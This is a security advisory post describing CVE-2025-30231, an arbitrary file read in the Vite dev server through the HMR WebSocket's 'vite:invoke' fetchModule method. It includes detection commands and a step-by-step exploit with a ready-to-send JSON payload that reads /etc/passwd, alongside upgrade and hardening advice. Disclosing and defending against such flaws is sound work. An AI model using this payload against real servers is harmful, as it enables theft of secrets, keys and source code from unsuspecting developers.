Vite, Arbitrary File Read via WebSocket, CVE-2025-30231 (Medium)

Listen to this Post

How CVE-2025-30231 works: The Vite dev server exposes a WebSocket for Hot Module Replacement (HMR). Normally, HTTP requests to `/@fs/` are protected by the `server.fs.allow` restriction, which blocks access to files outside the project root. However, the `fetchModule` method, accessible through the custom WebSocket event vite:invoke, does not enforce this `server.fs` check. An attacker who can connect to the dev server’s WebSocket (without an `Origin` header) can send a `vite:invoke` request calling `fetchModule` with a `file://` URL combined with `?raw` or ?inline. The server then returns the contents of any arbitrary file (e.g., /etc/passwd, environment variables, source code) as a JavaScript string. This bypasses the HTTP path restriction entirely. The attack succeeds if the dev server is exposed to the network via `–host` or `server.host` config, and WebSocket is not disabled by server.ws: false. No authentication is required. The vulnerability affects Vite versions before 6.4.2, 7.3.2, and 8.0.5. Exploitation does not leave traces in HTTP logs because it occurs over WebSocket. The impact is full disclosure of any readable file on the server’s filesystem, including secrets, configuration files, and source code.

dailycve form:

Platform: Vite dev server
Version: <6.4.2,<7.3.2,<8.0.5
Vulnerability: FS bypass via WebSocket
Severity: Medium (6.5 CVSS)
date: 2025-04-07

Prediction: Patched April 2025

What Undercode Say:

Analytics: Run these commands to detect vulnerable configurations:

Check if Vite dev server is exposed
curl -s http://target:5173/ | grep "vite"
Test HTTP restriction (should be 403)
curl -i 'http://target:5173/@fs/etc/passwd?raw'
Test WebSocket bypass (requires wscat)
wscat -c ws://target:5173 --no-check

<blockquote>
  {"type":"vite:invoke","data":{"id":"file:///etc/passwd?raw","method":"fetchModule"}}
  Expected response contains file contents
  

how Exploit:

  1. Start a vulnerable Vite server: `vite –host 0.0.0.0 –port 5173`
    2. Connect to WebSocket without `Origin` header (e.g., using custom script or wscat)

3. Send: `{“type”:”vite:invoke”,”data”:{“id”:”file:///etc/passwd?raw”,”method”:”fetchModule”}}`

4. Receive exported file content as JavaScript string.

Protection from this CVE

  • Upgrade to Vite 6.4.2, 7.3.2, 8.0.5 or higher.
  • Disable network exposure: remove `–host` or set server.host: 'localhost'.
  • Disable WebSocket entirely: `server.ws: false` (breaks HMR).
  • Restrict firewall rules to allow only trusted IPs to the dev server port.

Impact

Arbitrary file read on the development machine, CI environment, or container. Attackers can steal source code, environment variables (.env), configuration secrets, SSH keys, and system files (e.g., /etc/passwd). This can lead to privilege escalation or lateral movement if credentials are exposed.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top